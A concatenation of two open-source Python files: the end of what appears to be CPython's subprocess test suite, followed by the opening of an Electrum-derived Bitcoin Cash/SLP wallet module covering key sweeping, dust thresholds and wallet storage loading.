self.assertEqual(0, p.returncode, "sigchild_ignore.py exited"
" non-zero with this error:\n%s" %
stderr.decode('utf-8'))
def test_select_unbuffered(self):
# Issue #11459: bufsize=0 should really set the pipes as
# unbuffered (and therefore let select() work properly).
select = support.import_module("select")
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple")'],
stdout=subprocess.PIPE,
bufsize=0)
f = p.stdout
self.addCleanup(f.close)
try:
self.assertEqual(f.read(4), b"appl")
self.assertIn(f, select.select([f], [], [], 0.0)[0])
finally:
p.wait()
def test_zombie_fast_process_del(self):
# Issue #12650: on Unix, if Popen.__del__() was called before the
# process exited, it wouldn't be added to subprocess._active, and would
# remain a zombie.
# spawn a Popen, and delete its reference before it exits
p = subprocess.Popen([sys.executable, "-c",
'import sys, time;'
'time.sleep(0.2)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
ident = id(p)
pid = p.pid
with support.check_warnings(('', ResourceWarning)):
p = None
# check that p is in the active processes list
self.assertIn(ident, [id(o) for o in subprocess._active])
def test_leak_fast_process_del_killed(self):
# Issue #12650: on Unix, if Popen.__del__() was called before the
# process exited, and the process got killed by a signal, it would never
# be removed from subprocess._active, which triggered a FD and memory
# leak.
# spawn a Popen, delete its reference and kill it
p = subprocess.Popen([sys.executable, "-c",
'import time;'
'time.sleep(3)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
ident = id(p)
pid = p.pid
with support.check_warnings(('', ResourceWarning)):
p = None
os.kill(pid, signal.SIGKILL)
# check that p is in the active processes list
self.assertIn(ident, [id(o) for o in subprocess._active])
# let some time for the process to exit, and create a new Popen: this
# should trigger the wait() of p
time.sleep(0.2)
with self.assertRaises(OSError) as c:
with subprocess.Popen(['nonexisting_i_hope'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
pass
# p should have been wait()ed on, and removed from the _active list
self.assertRaises(OSError, os.waitpid, pid, 0)
self.assertNotIn(ident, [id(o) for o in subprocess._active])
def test_close_fds_after_preexec(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
# this FD is used as dup2() target by preexec_fn, and should be closed
# in the child process
fd = os.dup(1)
self.addCleanup(os.close, fd)
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
preexec_fn=lambda: os.dup2(1, fd))
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertNotIn(fd, remaining_fds)
@support.cpython_only
def test_fork_exec(self):
# Issue #22290: fork_exec() must not crash on memory allocation failure
# or other errors
import _posixsubprocess
gc_enabled = gc.isenabled()
try:
# Use a preexec function and enable the garbage collector
# to force fork_exec() to re-enable the garbage collector
# on error.
func = lambda: None
gc.enable()
for args, exe_list, cwd, env_list in (
(123, [b"exe"], None, [b"env"]),
([b"arg"], 123, None, [b"env"]),
([b"arg"], [b"exe"], 123, [b"env"]),
([b"arg"], [b"exe"], None, 123),
):
with self.assertRaises(TypeError):
_posixsubprocess.fork_exec(
args, exe_list,
True, [], cwd, env_list,
-1, -1, -1, -1,
1, 2, 3, 4,
True, True, func)
finally:
if not gc_enabled:
gc.disable()
@support.cpython_only
def test_fork_exec_sorted_fd_sanity_check(self):
# Issue #23564: sanity check the fork_exec() fds_to_keep sanity check.
import _posixsubprocess
gc_enabled = gc.isenabled()
try:
gc.enable()
for fds_to_keep in (
(-1, 2, 3, 4, 5), # Negative number.
('str', 4), # Not an int.
(18, 23, 42, 2**63), # Out of range.
(5, 4), # Not sorted.
(6, 7, 7, 8), # Duplicate.
):
with self.assertRaises(
ValueError,
msg='fds_to_keep={}'.format(fds_to_keep)) as c:
_posixsubprocess.fork_exec(
[b"false"], [b"false"],
True, fds_to_keep, None, [b"env"],
-1, -1, -1, -1,
1, 2, 3, 4,
True, True, None)
self.assertIn('fds_to_keep', str(c.exception))
finally:
if not gc_enabled:
gc.disable()
def test_communicate_BrokenPipeError_stdin_close(self):
# By not setting stdout or stderr or a timeout we force the fast path
# that just calls _stdin_write() internally due to our mock.
proc = subprocess.Popen([sys.executable, '-c', 'pass'])
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin:
mock_proc_stdin.close.side_effect = BrokenPipeError
proc.communicate() # Should swallow BrokenPipeError from close.
mock_proc_stdin.close.assert_called_with()
def test_communicate_BrokenPipeError_stdin_write(self):
# By not setting stdout or stderr or a timeout we force the fast path
# that just calls _stdin_write() internally due to our mock.
proc = subprocess.Popen([sys.executable, '-c', 'pass'])
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin:
mock_proc_stdin.write.side_effect = BrokenPipeError
proc.communicate(b'stuff') # Should swallow the BrokenPipeError.
mock_proc_stdin.write.assert_called_once_with(b'stuff')
mock_proc_stdin.close.assert_called_once_with()
def test_communicate_BrokenPipeError_stdin_flush(self):
# Setting stdin and stdout forces the ._communicate() code path.
# python -h exits faster than python -c pass (but spams stdout).
proc = subprocess.Popen([sys.executable, '-h'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin, \
open(os.devnull, 'wb') as dev_null:
mock_proc_stdin.flush.side_effect = BrokenPipeError
# because _communicate registers a selector using proc.stdin...
mock_proc_stdin.fileno.return_value = dev_null.fileno()
# _communicate() should swallow BrokenPipeError from flush.
proc.communicate(b'stuff')
mock_proc_stdin.flush.assert_called_once_with()
def test_communicate_BrokenPipeError_stdin_close_with_timeout(self):
# Setting stdin and stdout forces the ._communicate() code path.
# python -h exits faster than python -c pass (but spams stdout).
proc = subprocess.Popen([sys.executable, '-h'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin:
mock_proc_stdin.close.side_effect = BrokenPipeError
# _communicate() should swallow BrokenPipeError from close.
proc.communicate(timeout=999)
mock_proc_stdin.close.assert_called_once_with()
@unittest.skipUnless(mswindows, "Windows specific tests")
class Win32ProcessTestCase(BaseTestCase):
def test_startupinfo(self):
# startupinfo argument
# We uses hardcoded constants, because we do not want to
# depend on win32all.
STARTF_USESHOWWINDOW = 1
SW_MAXIMIZE = 3
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags = STARTF_USESHOWWINDOW
startupinfo.wShowWindow = SW_MAXIMIZE
# Since Python is a console process, it won't be affected
# by wShowWindow, but the argument should be silently
# ignored
subprocess.call([sys.executable, "-c", "import sys; sys.exit(0)"],
startupinfo=startupinfo)
def test_creationflags(self):
# creationflags argument
CREATE_NEW_CONSOLE = 16
sys.stderr.write(" a DOS box should flash briefly ...\n")
subprocess.call(sys.executable +
' -c "import time; time.sleep(0.25)"',
creationflags=CREATE_NEW_CONSOLE)
def test_invalid_args(self):
# invalid arguments should raise ValueError
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
preexec_fn=lambda: 1)
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
stdout=subprocess.PIPE,
close_fds=True)
def test_close_fds(self):
# close file descriptors
rc = subprocess.call([sys.executable, "-c",
"import sys; sys.exit(47)"],
close_fds=True)
self.assertEqual(rc, 47)
def test_shell_sequence(self):
# Run command through the shell (sequence)
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen(["set"], shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertIn(b"physalis", p.stdout.read())
def test_shell_string(self):
# Run command through the shell (string)
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen("set", shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertIn(b"physalis", p.stdout.read())
def test_shell_encodings(self):
# Run command through the shell (string)
for enc in ['ansi', 'oem']:
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen("set", shell=1,
stdout=subprocess.PIPE,
env=newenv,
encoding=enc)
with p:
self.assertIn("physalis", p.stdout.read(), enc)
def test_call_string(self):
# call() function with string argument on Windows
rc = subprocess.call(sys.executable +
' -c "import sys; sys.exit(47)"')
self.assertEqual(rc, 47)
def _kill_process(self, method, *args):
# Some win32 buildbot raises EOFError if stdin is inherited
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
time.sleep(30)
"""],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
with p:
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
getattr(p, method)(*args)
_, stderr = p.communicate()
self.assertStderrEqual(stderr, b'')
returncode = p.wait()
self.assertNotEqual(returncode, 0)
def _kill_dead_process(self, method, *args):
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
sys.exit(42)
"""],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
with p:
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
# The process should end after this
time.sleep(1)
# This shouldn't raise even though the child is now dead
getattr(p, method)(*args)
_, stderr = p.communicate()
self.assertStderrEqual(stderr, b'')
rc = p.wait()
self.assertEqual(rc, 42)
def test_send_signal(self):
self._kill_process('send_signal', signal.SIGTERM)
def test_kill(self):
self._kill_process('kill')
def test_terminate(self):
self._kill_process('terminate')
def test_send_signal_dead(self):
self._kill_dead_process('send_signal', signal.SIGTERM)
def test_kill_dead(self):
self._kill_dead_process('kill')
def test_terminate_dead(self):
self._kill_dead_process('terminate')
class MiscTests(unittest.TestCase):
def test_getoutput(self):
self.assertEqual(subprocess.getoutput('echo xyzzy'), 'xyzzy')
self.assertEqual(subprocess.getstatusoutput('echo xyzzy'),
(0, 'xyzzy'))
# we use mkdtemp in the next line to create an empty directory
# under our exclusive control; from that, we can invent a pathname
# that we _know_ won't exist. This is guaranteed to fail.
dir = None
try:
dir = tempfile.mkdtemp()
name = os.path.join(dir, "foo")
status, output = subprocess.getstatusoutput(
("type " if mswindows else "cat ") + name)
self.assertNotEqual(status, 0)
finally:
if dir is not None:
os.rmdir(dir)
def test__all__(self):
"""Ensure that __all__ is populated properly."""
intentionally_excluded = {"list2cmdline", "Handle"}
exported = set(subprocess.__all__)
possible_exports = set()
import types
for name, value in subprocess.__dict__.items():
if name.startswith('_'):
continue
if isinstance(value, (types.ModuleType,)):
continue
possible_exports.add(name)
self.assertEqual(exported, possible_exports - intentionally_excluded)
@unittest.skipUnless(hasattr(selectors, 'PollSelector'),
"Test needs selectors.PollSelector")
class ProcessTestCaseNoPoll(ProcessTestCase):
def setUp(self):
self.orig_selector = subprocess._PopenSelector
subprocess._PopenSelector = selectors.SelectSelector
ProcessTestCase.setUp(self)
def tearDown(self):
subprocess._PopenSelector = self.orig_selector
ProcessTestCase.tearDown(self)
@unittest.skipUnless(mswindows, "Windows-specific tests")
class CommandsWithSpaces (BaseTestCase):
def setUp(self):
super().setUp()
f, fname = tempfile.mkstemp(".py", "te st")
self.fname = fname.lower ()
os.write(f, b"import sys;"
b"sys.stdout.write('%d %s' % (len(sys.argv), [a.lower () for a in sys.argv]))"
)
os.close(f)
def tearDown(self):
os.remove(self.fname)
super().tearDown()
def with_spaces(self, *args, **kwargs):
kwargs['stdout'] = subprocess.PIPE
p = subprocess.Popen(*args, **kwargs)
with p:
self.assertEqual(
p.stdout.read ().decode("mbcs"),
"2 [%r, 'ab cd']" % self.fname
)
def test_shell_string_with_spaces(self):
# call() function with string argument with spaces on Windows
self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname,
"ab cd"), shell=1)
def test_shell_sequence_with_spaces(self):
# call() function with sequence argument with spaces on Windows
self.with_spaces([sys.executable, self.fname, "ab cd"], shell=1)
def test_noshell_string_with_spaces(self):
# call() function with string argument with spaces on Windows
self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname,
"ab cd"))
def test_noshell_sequence_with_spaces(self):
# call() function with sequence argument with spaces on Windows
self.with_spaces([sys.executable, self.fname, "ab cd"])
class ContextManagerTests(BaseTestCase):
def test_pipe(self):
with subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.stdout.write('stdout');"
"sys.stderr.write('stderr');"],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
self.assertEqual(proc.stdout.read(), b"stdout")
self.assertStderrEqual(proc.stderr.read(), b"stderr")
self.assertTrue(proc.stdout.closed)
self.assertTrue(proc.stderr.closed)
def test_returncode(self):
with subprocess.Popen([sys.executable, "-c",
"import sys; sys.exit(100)"]) as proc:
pass
# __exit__ calls wait(), so the returncode should be set
self.assertEqual(proc.returncode, 100)
def test_communicate_stdin(self):
with subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.exit(sys.stdin.read() == 'context')"],
stdin=subprocess.PIPE) as proc:
proc.communicate(b"context")
self.assertEqual(proc.returncode, 1)
def test_invalid_args(self):
with self.assertRaises((FileNotFoundError, PermissionError)) as c:
with subprocess.Popen(['nonexisting_i_hope'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
pass
def test_broken_pipe_cleanup(self):
"""Broken pipe error should not prevent wait() (Issue 21619)"""
proc = subprocess.Popen([sys.executable, '-c', 'pass'],
stdin=subprocess.PIPE,
bufsize=support.PIPE_MAX_SIZE*2)
proc = proc.__enter__()
# Prepare to send enough data to overflow any OS pipe buffering and
# guarantee a broken pipe error. Data is held in BufferedWriter
# buffer until closed.
proc.stdin.write(b'x' * support.PIPE_MAX_SIZE)
self.assertIsNone(proc.returncode)
# EPIPE expected under POSIX; EINVAL under Windows
self.assertRaises(OSError, proc.__exit__, None, None, None)
self.assertEqual(proc.returncode, 0)
self.assertTrue(proc.stdin.closed)
if __name__ == "__main__":
unittest.main()
|
wallet.py
|
# Electrum - lightweight Bitcoin client
# Copyright (C) 2015 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# Wallet classes:
# - ImportedAddressWallet: imported address, no keystore
# - ImportedPrivkeyWallet: imported private keys, keystore
# - Standard_Wallet: one keystore, P2PKH
# - Multisig_Wallet: several keystores, P2SH
import copy
import errno
import json
import itertools
import os
import queue
import random
import re
import threading
import time
from collections import defaultdict, namedtuple
from enum import Enum, auto
from functools import partial
from typing import Set, Tuple, Union
from .i18n import ngettext
from .util import (NotEnoughFunds, NotEnoughFundsSlp, NotEnoughUnfrozenFundsSlp, ExcessiveFee, PrintError,
UserCancelled, profiler, format_satoshis, format_time, finalization_print_error, to_string,
TimeoutException, is_verbose)
from .address import Address, Script, ScriptOutput, PublicKey, OpCodes
from .bitcoin import *
from .version import *
from .keystore import load_keystore, Hardware_KeyStore, Imported_KeyStore, BIP32_KeyStore, xpubkey_to_address
from . import networks
from . import keystore
from .storage import multisig_type, WalletStorage
from . import transaction
from .transaction import Transaction, InputValueMissing
from .plugins import run_hook
from . import bitcoin
from . import coinchooser
from .synchronizer import Synchronizer
from .verifier import SPV, SPVDelegate
from . import schnorr
from . import ecc_fast
from .blockchain import NULL_HASH_HEX
from . import paymentrequest
from .paymentrequest import PR_PAID, PR_UNPAID, PR_UNKNOWN, PR_EXPIRED
from .paymentrequest import InvoiceStore
from .contacts import Contacts
from . import cashacct
from .slp import SlpMessage, SlpParsingError, SlpUnsupportedSlpTokenType, SlpNoMintingBatonFound, OpreturnError
from . import slp_validator_0x01, slp_validator_0x01_nft1, slp_slpdb_validator
from .slp_graph_search import slp_gs_mgr
def _(message): return message
TX_STATUS = [
_('Unconfirmed parent'),
_('Low fee'),
_('Unconfirmed'),
_('Not Verified'),
]
del _
from .i18n import _
DEFAULT_CONFIRMED_ONLY = False
def relayfee(network):
RELAY_FEE = 5000
MAX_RELAY_FEE = 50000
f = network.relay_fee if network and network.relay_fee else RELAY_FEE
return min(f, MAX_RELAY_FEE)
def dust_threshold(network):
# Change < dust threshold is added to the tx fee
#return 182 * 3 * relayfee(network) / 1000 # original Electrum logic
#return 1 # <-- was this value until late Sept. 2018
return 546 # hard-coded Bitcoin Cash dust threshold. Was changed to this as of Sept. 2018
def sweep_preparations(privkeys, network, imax=100):
class InputsMaxxed(Exception):
pass
def append_utxos_to_inputs(inputs, pubkey, txin_type):
if txin_type == 'p2pkh':
address = Address.from_pubkey(pubkey)
else:
address = PublicKey.from_pubkey(pubkey)
sh = address.to_scripthash_hex()
u = network.synchronous_get(('blockchain.scripthash.listunspent', [sh]))
for item in u:
if len(inputs) >= imax:
raise InputsMaxxed()
item['address'] = address
item['type'] = txin_type
item['prevout_hash'] = item['tx_hash']
item['prevout_n'] = item['tx_pos']
item['pubkeys'] = [pubkey]
item['x_pubkeys'] = [pubkey]
item['signatures'] = [None]
item['num_sig'] = 1
inputs.append(item)
def find_utxos_for_privkey(txin_type, privkey, compressed):
pubkey = bitcoin.public_key_from_private_key(privkey, compressed)
append_utxos_to_inputs(inputs, pubkey, txin_type)
keypairs[pubkey] = privkey, compressed
inputs = []
keypairs = {}
try:
for sec in privkeys:
txin_type, privkey, compressed = bitcoin.deserialize_privkey(sec)
find_utxos_for_privkey(txin_type, privkey, compressed)
# do other lookups to increase support coverage
if is_minikey(sec):
# minikeys don't have a compressed byte
# we lookup both compressed and uncompressed pubkeys
find_utxos_for_privkey(txin_type, privkey, not compressed)
elif txin_type == 'p2pkh':
# WIF serialization does not distinguish p2pkh and p2pk
# we also search for pay-to-pubkey outputs
find_utxos_for_privkey('p2pk', privkey, compressed)
elif txin_type == 'p2sh':
raise ValueError(_("The specified WIF key '{}' is a p2sh WIF key. These key types cannot be swept.").format(sec))
except InputsMaxxed:
pass
if not inputs:
raise ValueError(_('No inputs found. (Note that inputs need to be confirmed)'))
return inputs, keypairs
def sweep(privkeys, network, config, recipient, fee=None, imax=100, sign_schnorr=False):
inputs, keypairs = sweep_preparations(privkeys, network, imax)
total = sum(i.get('value') for i in inputs)
if fee is None:
outputs = [(TYPE_ADDRESS, recipient, total)]
tx = Transaction.from_io(inputs, outputs, sign_schnorr=sign_schnorr)
fee = config.estimate_fee(tx.estimated_size())
if total - fee < 0:
raise NotEnoughFunds(_('Not enough funds on address.') + '\nTotal: %d satoshis\nFee: %d'%(total, fee))
if total - fee < dust_threshold(network):
raise NotEnoughFunds(_('Not enough funds on address.') + '\nTotal: %d satoshis\nFee: %d\nDust Threshold: %d'%(total, fee, dust_threshold(network)))
outputs = [(TYPE_ADDRESS, recipient, total - fee)]
locktime = network.get_local_height()
tx = Transaction.from_io(inputs, outputs, locktime=locktime, sign_schnorr=sign_schnorr)
tx.BIP_LI01_sort()
tx.sign(keypairs)
return tx
class Abstract_Wallet(PrintError, SPVDelegate):
"""
Wallet classes are created to handle various address generation methods.
Completion states (watching-only, single account, no seed, etc) are handled inside classes.
"""
max_change_outputs = 3
def __init__(self, storage):
self.electrum_version = PACKAGE_VERSION
self.pre_release_tag = PRE_RELEASE_TAG
self.storage = storage
self.thread = None # this is used by the qt main_window to store a QThread. We just make sure it's always defined as an attribute here.
self.network = None
# verifier (SPV) and synchronizer are started in start_threads
self.synchronizer = None
self.verifier = None
# CashAccounts subsystem. Its network-dependent layer is started in
# start_threads. Note: object instantiation should be lightweight here.
# self.cashacct.load() is called later in this function to load data.
self.cashacct = cashacct.CashAcct(self)
finalization_print_error(self.cashacct) # debug object lifecycle
# slp graph databases for token type 1 and NFT1
self.slp_graph_0x01, self.slp_graph_0x01_nft = None, None
self.weak_window = None # Some of the GUI classes, such as the Qt ElectrumWindow, use this to refer back to themselves. This should always be a weakref.ref (Weak.ref), or None
# Removes defunct entries from self.pruned_txo asynchronously
self.pruned_txo_cleaner_thread = None
# Cache of Address -> (c,u,x) balance. This cache is used by
# get_addr_balance to significantly speed it up (it is called a lot).
# Cache entries are invalidated when tx's are seen involving this
# address (address history chages). Entries to this cache are added
# only inside get_addr_balance.
# Note that this data structure is touched by the network and GUI
# thread concurrently without the use of locks, because Python GIL
# allows us to get away with such things. As such do not iterate over
# this dict, but simply add/remove items to/from it in 1-liners (which
# Python's GIL makes thread-safe implicitly).
self._addr_bal_cache = {}
# We keep a set of the wallet and receiving addresses so that is_mine()
# checks are O(logN) rather than O(N). This creates/resets that cache.
self.invalidate_address_set_cache()
self.gap_limit_for_change = 20 # constant
# saved fields
self.use_change = storage.get('use_change', True)
self.multiple_change = storage.get('multiple_change', False)
self.labels = storage.get('labels', {})
# Frozen addresses
frozen_addresses = storage.get('frozen_addresses',[])
self.frozen_addresses = set(Address.from_string(addr)
for addr in frozen_addresses)
# Frozen coins (UTXOs) -- note that we have 2 independent levels of "freezing": address-level and coin-level.
# The two types of freezing are flagged independently of each other and 'spendable' is defined as a coin that satisfies
# BOTH levels of freezing.
self.frozen_coins = set(storage.get('frozen_coins', []))
self.frozen_coins_tmp = set() # in-memory only
# address -> list(txid, height)
history = storage.get('addr_history',{})
self._history = self.to_Address_dict(history)
# there is a difference between wallet.up_to_date and interface.is_up_to_date()
# interface.is_up_to_date() returns true when all requests have been answered and processed
# wallet.up_to_date is true when the wallet is synchronized (stronger requirement)
self.up_to_date = False
# The only lock. We used to have two here. That was more technical debt
# without much purpose. 1 lock is sufficient. In particular data
# structures that are touched by the network thread as well as the GUI
# (such as self.transactions, history, etc) need to be synchronized
# using this mutex.
self.lock = threading.RLock()
# load requests
requests = self.storage.get('payment_requests', {})
for key, req in requests.items():
req['address'] = Address.from_string(key)
self.receive_requests = {req['address']: req
for req in requests.values()}
# Transactions pending verification. A map from tx hash to transaction
# height. Access is contended so a lock is needed. Client code should
# use get_unverified_tx to get a thread-safe copy of this dict.
self.unverified_tx = defaultdict(int)
# Verified transactions. Each value is a (height, timestamp, block_pos) tuple. Access with self.lock.
self.verified_tx = storage.get('verified_tx3', {})
# save wallet type the first time
if self.storage.get('wallet_type') is None:
self.storage.put('wallet_type', self.wallet_type)
# invoices and contacts
self.invoices = InvoiceStore(self.storage)
self.contacts = Contacts(self.storage)
# cashacct is started in start_threads, but it needs to have relevant
# data here, before the below calls happen
self.cashacct.load()
# Now, finally, after object is constructed -- we can do this
self.load_keystore_wrapper()
self.load_addresses()
self.load_transactions()
self.build_reverse_history()
self.check_history()
# Print debug message on finalization
finalization_print_error(self, "[{}/{}] finalized".format(type(self).__name__, self.diagnostic_name()))
@property
def is_slp(self):
''' Note that the various Slp_* classes explicitly write to storage
to set the proper wallet_type on construction unconditionally, so
this should always be valid for SLP wallets. '''
return "slp_" in self.storage.get('wallet_type', '')
@classmethod
def to_Address_dict(cls, d):
'''Convert a dict of strings to a dict of Adddress objects.'''
return {Address.from_string(text): value for text, value in d.items()}
@classmethod
def from_Address_dict(cls, d):
'''Convert a dict of Address objects to a dict of strings.'''
return {addr.to_storage_string(): value
for addr, value in d.items()}
def diagnostic_name(self):
return self.basename()
def __str__(self):
return self.basename()
def get_master_public_key(self):
return None
def load_keystore_wrapper(self):
""" Loads the keystore, but also tries to preserve derivation(s). Older
Electron Cash versions would not save the derivation for all keystore
types. So this function ensures:
1. That on first run, we store the keystore_derivations to top-level
storage (which is preserved always).
2. On subsequent runs we try and load the keystore_derivations from
storage and restore them if the individual keystore.derivation data
items were lost (because user loaded wallet with older Electron
Cash).
This function is provided to allow users to switch between old and new
EC versions. In the future if we deprecate the wallet format, or if
enough time has passed, this function may be removed and the simple
self.load_keystore() may be used instead. """
self.load_keystore()
if not hasattr(self, 'get_keystores'):
return
from .keystore import Deterministic_KeyStore, Old_KeyStore
keystores = self.get_keystores()
keystore_derivations = self.storage.get('keystore_derivations', [])
if len(keystore_derivations) != len(keystores):
keystore_derivations = [None] * len(keystores)
updated, updated_ks, updated_st = False, False, False
for i, keystore in enumerate(keystores):
if i == 0 and isinstance(keystore, Deterministic_KeyStore) and not keystore.seed_type:
# Attempt to update keystore.seed_type
if isinstance(keystore, Old_KeyStore):
keystore.seed_type = 'old'
updated_st = True
else:
# attempt to restore the seed_type based on wallet saved "seed_type"
typ = self.storage.get('seed_type')
if typ in ('standard', 'electrum'):
keystore.seed_type = 'electrum'
updated_st = True
elif typ == 'bip39':
keystore.seed_type = 'bip39'
updated_st = True
saved_der = keystore_derivations[i]
der = (keystore.has_derivation() and keystore.derivation) or None
if der != saved_der:
if der:
# keystore had a derivation, but top-level storage did not
# (this branch is typically taken on first run after
# restoring from seed or creating a new wallet)
keystore_derivations[i] = saved_der = der
updated = True
elif saved_der:
# we had a derivation but keystore did not. This branch is
# taken if the user has loaded this wallet with an older
# version of Electron Cash. Attempt to restore their
# derivation item in keystore.
keystore.derivation = der # write to keystore
updated_ks = True # tell it to re-save
if updated:
self.print_error("Updated keystore_derivations")
self.storage.put('keystore_derivations', keystore_derivations)
if updated_ks or updated_st:
if updated_ks:
self.print_error("Updated keystore (lost derivations restored)")
if updated_st:
self.print_error("Updated keystore (lost seed_type restored)")
self.save_keystore()
if any((updated, updated_ks, updated_st)):
self.storage.write()
@profiler
def load_transactions(self):
txi = self.storage.get('txi', {})
self.txi = {tx_hash: self.to_Address_dict(value)
for tx_hash, value in txi.items()
# skip empty entries to save memory and disk space
if value}
txo = self.storage.get('txo', {})
self.txo = {tx_hash: self.to_Address_dict(value)
for tx_hash, value in txo.items()
# skip empty entries to save memory and disk space
if value}
self.tx_fees = self.storage.get('tx_fees', {})
self.pruned_txo = self.storage.get('pruned_txo', {})
self.pruned_txo_values = set(self.pruned_txo.values())
tx_list = self.storage.get('transactions', {})
self.transactions = {}
for tx_hash, raw in tx_list.items():
tx = Transaction(raw)
self.transactions[tx_hash] = tx
if not self.txi.get(tx_hash) and not self.txo.get(tx_hash) and (tx_hash not in self.pruned_txo_values):
self.print_error("removing unreferenced tx", tx_hash)
self.transactions.pop(tx_hash)
self.cashacct.remove_transaction_hook(tx_hash)
self.slpv1_validity = self.storage.get('slpv1_validity', {})
self.token_types = self.storage.get('token_types', {})
self.tx_tokinfo = self.storage.get('tx_tokinfo', {})
# load up slp_txo as defaultdict-of-defaultdict-of-dicts
self._slp_txo = defaultdict(lambda: defaultdict(dict))
for addr, addrdict in self.to_Address_dict(self.storage.get('slp_txo',{})).items():
for txid, txdict in addrdict.items():
# need to do this iteration since json stores int keys as decimal strings.
self._slp_txo[addr][txid] = {int(idx):d for idx,d in txdict.items()}
ok = self.storage.get('slp_data_version', False)
if ok != 3:
self.rebuild_slp()
@profiler
def save_transactions(self, write=False):
with self.lock:
tx = {}
for k,v in self.transactions.items():
tx[k] = str(v)
self.storage.put('transactions', tx)
txi = {tx_hash: self.from_Address_dict(value)
for tx_hash, value in self.txi.items()
# skip empty entries to save memory and disk space
if value}
txo = {tx_hash: self.from_Address_dict(value)
for tx_hash, value in self.txo.items()
# skip empty entries to save memory and disk space
if value}
self.storage.put('txi', txi)
self.storage.put('txo', txo)
self.storage.put('tx_fees', self.tx_fees)
self.storage.put('pruned_txo', self.pruned_txo)
history = self.from_Address_dict(self._history)
self.storage.put('addr_history', history)
### SLP stuff
self.storage.put('slpv1_validity', self.slpv1_validity)
self.storage.put('token_types', self.token_types)
self.storage.put('slp_txo', self.from_Address_dict(self._slp_txo))
self.storage.put('tx_tokinfo', self.tx_tokinfo)
self.storage.put('slp_data_version', 3)
if write:
self.storage.write()
def activate_slp(self):
# This gets called in two situations:
# - Upon wallet startup, it checks config to see if SLP should be enabled.
# - During wallet operation, on a network reconnect, to "wake up" the validator -- According to JSCramer this is required. TODO: Investigate why that is
with self.lock:
for tx_hash, tti in self.tx_tokinfo.items():
# Fire up validation on unvalidated txes
try:
tx = self.transactions[tx_hash]
self.slp_check_validation(tx_hash, tx)
except KeyError:
continue
_add_token_hex_re = re.compile('^[a-f0-9]{64}$')
def add_token_type(self, token_id, entry, check_validation=True):
if not isinstance(token_id, str) or not self._add_token_hex_re.match(token_id):
# Paranoia: we enforce canonical hex string as lowercase to avoid
# problems with the same token-id being added as upper or lowercase
# by client code. This is because token_id becomes a dictionary key
# in various places and it not being identical would create chaos.
raise ValueError('token_id must be a lowercase hex string of exactly 64 characters!')
with self.lock:
self.token_types[token_id] = dict(entry)
self.storage.put('token_types', self.token_types)
for tx_hash, tti in self.tx_tokinfo.items():
# Fire up validation on unvalidated txes of matching token_id
try:
if tti['token_id'] == token_id and check_validation:
tx = self.transactions[tx_hash]
self.slp_check_validation(tx_hash, tx)
except KeyError: # This catches the case where tx_tokinfo was set to {}
continue
def add_token_safe(self, token_class: str, token_id: str, token_name: str,
decimals_divisibility: int,
*, error_callback=None, allow_overwrite=False,
write_storage=True) -> bool:
''' This code was refactored from main_window.py to allow other
subsystems (eg CLI/RPC, other platforms, etc) to add tokens.
This function does some minimal sanity checks and returns True
on success or False on failure. The optional error_callback
is called on False return. The callback takes a single translated string
